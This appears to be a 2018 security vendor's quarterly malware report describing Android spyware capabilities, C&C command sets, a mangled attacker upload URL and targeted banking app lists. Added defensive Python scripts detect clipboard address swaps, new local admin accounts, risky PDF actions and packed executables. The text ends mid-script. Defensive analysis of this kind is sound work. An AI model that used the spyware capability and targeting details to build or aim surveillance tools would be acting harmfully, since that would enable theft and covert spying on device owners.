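"""Detect a clipboard address swap and validate legacy Bitcoin addresses.

Added example, not code from the report. The two addresses from the report are
used only as sample input; no claim is made about who controls them.
"""
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Shapes a hijacker pattern-matches on the clipboard (bech32 'bc1...' omitted for brevity).
ADDRESS_SHAPES = {
    "btc": re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def _checksum(raw):
    return hashlib.sha256(hashlib.sha256(raw).digest()).digest()[:4]


def b58check_encode(version, payload):
    """Base58Check-encode a version byte plus payload (e.g. a 20-byte hash160)."""
    data = bytes([version]) + payload
    data += _checksum(data)
    number = int.from_bytes(data, "big")
    digits = ""
    while number:
        number, rem = divmod(number, 58)
        digits = B58_ALPHABET[rem] + digits
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + digits       # each leading zero byte becomes a '1'


def b58check_decode(address):
    """Return (version, payload) or raise ValueError on bad characters or checksum."""
    number = 0
    for ch in address:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError("invalid base58 character %r" % ch)
        number = number * 58 + idx
    body = number.to_bytes((number.bit_length() + 7) // 8, "big") if number else b""
    leading_ones = len(address) - len(address.lstrip("1"))
    data = b"\x00" * leading_ones + body
    if len(data) < 5 or _checksum(data[:-4]) != data[-4:]:
        raise ValueError("checksum mismatch")
    return data[0], data[1:-4]


def is_valid_btc_address(address):
    """Shape plus checksum check for P2PKH (version 0x00) and P2SH (version 0x05)."""
    if not ADDRESS_SHAPES["btc"].match(address):
        return False
    try:
        version, payload = b58check_decode(address)
    except ValueError:
        return False
    return version in (0x00, 0x05) and len(payload) == 20


def address_kind(text):
    """Which coin's address shape the text matches, or None."""
    for kind, shape in ADDRESS_SHAPES.items():
        if shape.match(text):
            return kind
    return None


def clipboard_swap_verdict(copied, clipboard_now):
    """Compare what the user copied with what the clipboard holds at paste time.

    The hijacker substitutes an address that is itself well-formed, so checksum
    validation alone cannot catch it; only the comparison can.
    """
    copied, clipboard_now = copied.strip(), clipboard_now.strip()
    if copied == clipboard_now:
        return "unchanged"
    kind_before, kind_after = address_kind(copied), address_kind(clipboard_now)
    if kind_before and kind_after:
        return "address-swapped:%s->%s" % (kind_before, kind_after)
    return "changed"


if __name__ == "__main__":
    # The pair the report shows (what was copied vs. what was actually pasted).
    print(clipboard_swap_verdict("3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs",
                                 "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"))
    zero = b58check_encode(0x00, bytes(20))   # constructed vector: all-zero hash160
    flipped = zero[:-1] + ("2" if zero[-1] != "2" else "3")
    print(zero, is_valid_btc_address(zero), is_valid_btc_address(flipped))
```

A wallet front end that records the address at copy time (or that the user pasted from a trusted source) can call `clipboard_swap_verdict` right before signing; a "address-swapped" verdict is the moment to stop and show both strings to the user, since the new one will look perfectly valid.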

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: every smartphone now holds a plethora of confidential information about its owner.

If the victim is a CEO, a politician or another VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, cybercriminals are not the only ones hunting for smartphone content: intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking their partners' every move and parents wanting to keep tabs on their children, and it is easy to see why Android-oriented malware is a growing business.

Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks in the graph.

The digital spooks


Like real-world spies, these digital agents impersonate legitimate entities, posing as innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version-1: Naver Defender

Version-2: Netease Defender

Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates the mobile device and hides its icon from the launcher screen to avoid detection. This sample has multiple spying abilities. It steals account details (contact ID, name, phone numbers and email address of the owner). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email type) and the photos of contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server at httphttpcgalimcomadminhrpupuphpdo=upload.

KevDroid records the victim's every phone call, then encrypts the recording and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera, covertly records the victim's activity and sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of the files on the device. It also extracts the web history, account and contact details, and device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This assumption can be costly: the first version of the Desert Scorpion spyware was spread through Google Play, camouflaged as a chat app called Dardesh. When a user downloaded and ran it, the app covertly connected to the cybercriminals' command-and-control server and downloaded the spyware onto the device. From that moment the spyware kept track of every event on the infected device. Social networks were another means of distributing the malware.

Version-1: Dardesh (Google Play Services, Instant Apps)

Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. Similar capabilities are found in commercial spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts their metadata and makes changes on the victim's device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1: Telegram Groups, انتخاب دھم

Version-2: Postrall, Yes For Referendum, انتخاب دھم

Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机

Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

Enable and disable the GPS services

Record audio and send it to the Command & Control server

Upload image files

Collect information about the installed applications

Collect browser data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy and DroFirewall. In addition to the abilities of the previous versions, it includes some additional tricks:

Extracts photos, audio and videos

Records screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware specifically hunts for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it brings a bundle of malicious abilities:

Takes control of the Bluetooth adapter

Extracts data about accounts, contact details and installed apps

Extracts data from the WhatsApp message DB and the related keys

Uploads the collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with a purposeful hunt for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: Facebook, Chrome

Disguises of Xloader


After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs

Extract contact details

Keep Wi-Fi always on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable the Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is the champion in the number of masks it puts on to deceive users.

App Distribution: FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware feature set, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts the files on external storage and deletes the originals after encryption. So we can call it a spy with a "007 licence".

Version 1: Adobe Flash Player

Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on your device:


Send_SMS: extract SMS content and send it to the C&C server

Send_USSD: send the USSD to the C&C server

Gethistory: monitor browser history

Start_AllApp: gather info about installed applications

Send_call: set the Intent action to call

Forward_call: forward incoming calls

ResForward_call: reset call forwarding

Go_Smsmnd: delete SMS content

Go_GetAlls: get SMS history

Dell_sms: delete SMS content in a conversation

Send_spam: send spam SMS

Start_Inject: call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot:

佐川急便, 현대캐피탈

Disguises of FakeSpy

It collects the available information from the infected device and sends it to the C&C servers. It also checks for the presence of the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some of the commands from its Command and Control server:

contacts: get contact details and email ID

Mute: set the ringer to mute

Mms: get MMS content

info: get device information


4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber

Version 2: Update Google Market, Flash Player, Tactic, FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following banking applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can also block access to some sites and apps, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, operates mostly in Iran. It spreads through third-party app stores, social networks and messengers.

Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it keeps running in the background and starts its spying activity: it steals text messages and audio recordings, makes calls, detects the device location, and so on. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Disguises of Sonvpay


Sonvpay covertly subscribes infected devices to WAP and SMS services, adding extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option; clicking it lets the malware start working in the background, subscribing the user to services she never ordered.

It reaches victims in the variety of disguises listed above.

4.1.11 CoinHive

The last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining potential. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.

Version-1: Netflix Hack, Instagram Hack

Version-2: TSF Launcher

Version-3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is that possible? Imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for the purpose, downloads it and implants it on the victims' machines. However, she is unaware that another cybercriminal has earlier infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.

This story illustrates the situation in cybersecurity in Q2: no one can feel totally secure, and even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Chart: Android-targeted malware in April 2018

4.2.2 May 2018

Chart: Android-targeted malware in May 2018



4.2.3 June 2018

Chart: Android-targeted malware in June 2018



5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network services and defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses the share from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected. Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms spread by mailing copies of themselves from victim computers, and many combine this with other vectors, for example software exploits and autorun functionality, to travel between machines.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory-resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant-messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a well-known IM Worm called Yahos, which in 2012 led the FBI to arrest 10 people for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was DarkComet, a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives, such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the Administrators group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
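The account-creation behaviour Microsoft attributes to Starter is visible in the Windows Security log as a 4720 (user account created) followed shortly by a 4732 (member added to a security-enabled local group) naming the Administrators group. The detection below is an added example written for readers of this report, not code from Comodo or Microsoft; it correlates the two events on the account SID over a short window. The flattened one-line log format and every host, user and timestamp in it are constructed.

```python
"""Detection logic for the behaviour attributed to the Starter trojan: a local
account is created (4720) and promptly added to Administrators (4732).
Added example (not Comodo's or Microsoft's code); the log format and every
host, user and timestamp below are constructed for illustration."""
from datetime import datetime, timedelta

EVENT_USER_CREATED = "4720"          # Windows Security: a user account was created
EVENT_LOCAL_GROUP_ADD = "4732"       # Windows Security: member added to a local group
ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of the local Administrators group

# Constructed sample events in a simplified "timestamp|event_id|key=value;..."
# layout (a flattening of the fields real events carry, not Windows' XML).
SAMPLE_LOG = """\
2018-06-03T08:12:01|4720|Subject=CORP\\jsmith;TargetUser=backupsvc;TargetSid=S-1-5-21-1-1-1-1105
2018-06-03T08:12:03|4732|Subject=CORP\\jsmith;Member=S-1-5-21-1-1-1-1105;Group=S-1-5-32-544
2018-06-03T09:40:00|4720|Subject=CORP\\helpdesk;TargetUser=newhire;TargetSid=S-1-5-21-1-1-1-1106
2018-06-03T11:05:10|4732|Subject=CORP\\helpdesk;Member=S-1-5-21-1-1-1-1106;Group=S-1-5-32-545
2018-06-05T23:58:44|4720|Subject=NT AUTHORITY\\SYSTEM;TargetUser=Remote Service Account;TargetSid=S-1-5-21-1-1-1-1107
2018-06-06T00:00:02|4732|Subject=NT AUTHORITY\\SYSTEM;Member=S-1-5-21-1-1-1-1107;Group=S-1-5-32-544
"""


def parse_events(text):
    """Yield one dict per line with 'time', 'id' and one key per logged field."""
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, event_id, fields = line.split("|", 2)
        event = {"time": datetime.fromisoformat(stamp), "id": event_id}
        for pair in fields.split(";"):
            key, value = pair.split("=", 1)
            event[key] = value
        yield event


def find_suspicious_admin_creations(text, window=timedelta(minutes=10)):
    """Return one alert per account that was created (4720) and then added to
    Administrators (4732 with the Administrators SID) within `window`.
    The two events are joined on the account SID rather than the name: the
    name is only a display hint and can be changed between the two events."""
    created = {}   # TargetSid -> the 4720 event that created it
    alerts = []
    for ev in sorted(parse_events(text), key=lambda e: e["time"]):
        if ev["id"] == EVENT_USER_CREATED:
            created[ev["TargetSid"]] = ev
        elif ev["id"] == EVENT_LOCAL_GROUP_ADD and ev["Group"] == ADMINISTRATORS_SID:
            origin = created.get(ev["Member"])
            if origin is None:
                continue   # pre-existing account promoted: a separate, noisier rule
            delta = ev["time"] - origin["time"]
            if timedelta(0) <= delta <= window:
                alerts.append({
                    "user": origin["TargetUser"],
                    "sid": ev["Member"],
                    "created_by": origin["Subject"],
                    "promoted_by": ev["Subject"],
                    "seconds": int(delta.total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_admin_creations(SAMPLE_LOG):
        print("new local admin {user!r} ({sid}) created by {created_by}, "
              "promoted by {promoted_by} after {seconds}s".format(**alert))
```

On the sample, the helpdesk-created account lands in Users (S-1-5-32-545) and is not flagged, while both accounts that reach Administrators within seconds are. Accounts that already existed and are merely promoted are deliberately left to a separate rule, since that is the far more common legitimate case and needs its own baseline.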


5.2.4 Exploits

Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

Exploit detections can be rare, as the underlying vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo targeted a favorite hacker target: Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents in a common way independent of application software, hardware and operating system.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
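Most malicious PDFs need two things: an automatic trigger (an /OpenAction in the catalog or an additional-actions /AA dictionary on a page) and a payload action (/JavaScript, /Launch, rich media), and they commonly hide both by hex-escaping the name (/A#41 for /AA) or burying the action object inside a FlateDecode stream. The triage script below is an added example, not Comodo's detection logic; it normalizes both tricks before counting. The sample document is constructed for the example and carries no exploit.

```python
"""Static triage of a PDF for the hooks exploit documents rely on: automatic
actions (/OpenAction, /AA), script and launch actions, and embedded files,
looking inside FlateDecode streams and past #xx-escaped names that hide the
keywords from a naive grep. Added example, not code from the report; the
sample document below is constructed and contains no exploit."""
import re
import zlib

# /Launch and /JavaScript give the document a way to run code; /OpenAction
# and /AA make it run without a click. The rest are common carriers.
RISKY_NAMES = ["/OpenAction", "/AA", "/JavaScript", "/JS", "/Launch",
               "/EmbeddedFile", "/RichMedia", "/ObjStm"]
TRIGGERS = {"/OpenAction", "/AA"}
PAYLOADS = {"/JavaScript", "/JS", "/Launch", "/RichMedia"}


def decode_names(data: bytes) -> bytes:
    """Undo PDF name escaping: /Ja#76aScript -> /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Concatenate the contents of every stream that inflates with zlib
    (FlateDecode); streams using other filters are skipped, not errors."""
    chunks = []
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            chunks.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass
    return b"\n".join(chunks)


def count_names(blob: bytes) -> dict:
    # The negative lookahead stops /JS from also matching longer names.
    return {name: len(re.findall(re.escape(name.encode()) + rb"(?![A-Za-z0-9])", blob))
            for name in RISKY_NAMES}


def triage_pdf(data: bytes) -> dict:
    """Count risky names in the visible objects and inside inflated streams,
    and flag a trigger/payload pair or signs of deliberate hiding."""
    visible = count_names(decode_names(data))
    hidden = count_names(decode_names(inflate_streams(data)))
    counts = {n: visible[n] + hidden[n] for n in RISKY_NAMES}
    obfuscated = re.search(rb"/[A-Za-z0-9]*#[0-9A-Fa-f]{2}", data) is not None
    in_streams = [n for n in RISKY_NAMES if hidden[n]]
    trigger = any(counts[n] for n in TRIGGERS)
    payload = any(counts[n] for n in PAYLOADS)
    suspicious = (trigger and payload) or obfuscated or bool(in_streams)
    return {"counts": counts, "obfuscated_names": obfuscated,
            "in_streams": in_streams, "suspicious": suspicious}


# Constructed sample: the catalog opens object 4 automatically, the page has an
# /AA dictionary spelled /A#41, and the action itself sits in a Flate stream.
_ACTION = zlib.compress(b"<< /S /JavaScript /JS (app.alert('constructed sample')) >>")
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /A#41 << /O 4 0 R >> >> endobj\n"
    + b"4 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(_ACTION)
    + _ACTION + b"\nendstream\nendobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
BENIGN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"

if __name__ == "__main__":
    print(triage_pdf(SAMPLE_PDF))
```

A plain byte search for "/JavaScript" misses the sample entirely: the name only exists inside the compressed stream, and the /AA trigger is escaped. Real documents add further layers (object streams, other filters, JavaScript that builds its payload at runtime), so a hit here is a reason to detonate the file in a sandbox, not a verdict.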


5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructors

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or encrypting it and wrapping it in a small stub that restores it at runtime. The hostile code can even come in the form of scripts. The compressed data is paired with separate decompression code, or shipped as a self-extracting archive, which recreates the original code from the compressed form and then executes the malware. Encryption may also be used to conceal the malware from security software, as another means of obfuscating the attack.

MUPX, the detection name for modified builds of the "Ultimate Packer for Executables" (UPX), dominated this part of the malware landscape. UPX itself is free, open-source software that is compatible with numerous file formats and operating systems and leverages the open-source UCL data-compression library, whose decompressor is only a few hundred bytes of code in length. Modified builds change the stock section names and unpacking stub so that a plain UPX signature no longer matches, while the malware inside is unchanged.

In Q2 2018, Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
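Stock UPX is easy to recognize: sections named UPX0 and UPX1, a hollow first section with a large VirtualSize and zero SizeOfRawData, the "UPX!" magic, and close to eight bits per byte of entropy in the packed section. Modified builds rename the sections and strip the magic, so a useful check also keeps the structural and entropy tests, which survive those edits. The script below is an added example, not Comodo's classifier; it builds three stripped-down PE images inline (constructed, with no optional header, so a real loader would reject them) and runs the same checks against each.

```python
"""Packer triage for PE files: section names, the UPX magic, the hollow
first-section layout and per-section entropy. Added example, not code from
the report; the sample PEs are built inline and are stripped-down (no
optional header), not real executables."""
import hashlib
import math
import struct
from collections import Counter

SECTION_HEADER = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: ~8.0 for compressed or encrypted data, ~4-6 for x86 code."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum((c / n) * math.log2(c / n) for c in Counter(buf).values())


def parse_sections(data: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table and
    return each section with the entropy of its on-disk bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        f = struct.unpack_from(SECTION_HEADER, data, table + 40 * i)
        name = f[0].rstrip(b"\0").decode("latin-1")
        vsize, raw_size, raw_ptr = f[1], f[3], f[4]
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "virtual_size": vsize,
                         "raw_size": raw_size, "entropy": shannon_entropy(raw)})
    return sections


def packer_indicators(data: bytes) -> dict:
    secs = parse_sections(data)
    upx_named = [s["name"] for s in secs if s["name"].upper().startswith("UPX")]
    high_entropy = [s["name"] for s in secs if s["raw_size"] >= 1024 and s["entropy"] > 7.0]
    has_magic = b"UPX!" in data
    # Stock UPX layout: the first section reserves address space for the
    # unpacked image (large VirtualSize) but holds no bytes on disk.
    hollow_first = bool(secs) and secs[0]["raw_size"] == 0 and secs[0]["virtual_size"] > 0
    if upx_named or has_magic:
        verdict = "UPX"
    elif high_entropy and hollow_first:
        verdict = "probably packed, UPX-like layout with renamed sections"
    elif high_entropy:
        verdict = "probably packed or encrypted"
    else:
        verdict = "not obviously packed"
    return {"verdict": verdict, "upx_sections": upx_named, "high_entropy": high_entropy,
            "upx_magic": has_magic, "hollow_first_section": hollow_first}


def build_pe(sections) -> bytes:
    """Assemble a minimal PE (constructed sample): DOS stub, PE signature, COFF
    header with a zero-length optional header, section table, section data.
    `sections` is a list of (name, raw_bytes, virtual_size)."""
    e_lfanew = 64
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    raw_ptr = e_lfanew + 4 + 20 + 40 * len(sections)
    headers, blobs, va = [], [], 0x1000
    for name, raw, vsize in sections:
        headers.append(struct.pack(SECTION_HEADER, name.encode().ljust(8, b"\0"), vsize, va,
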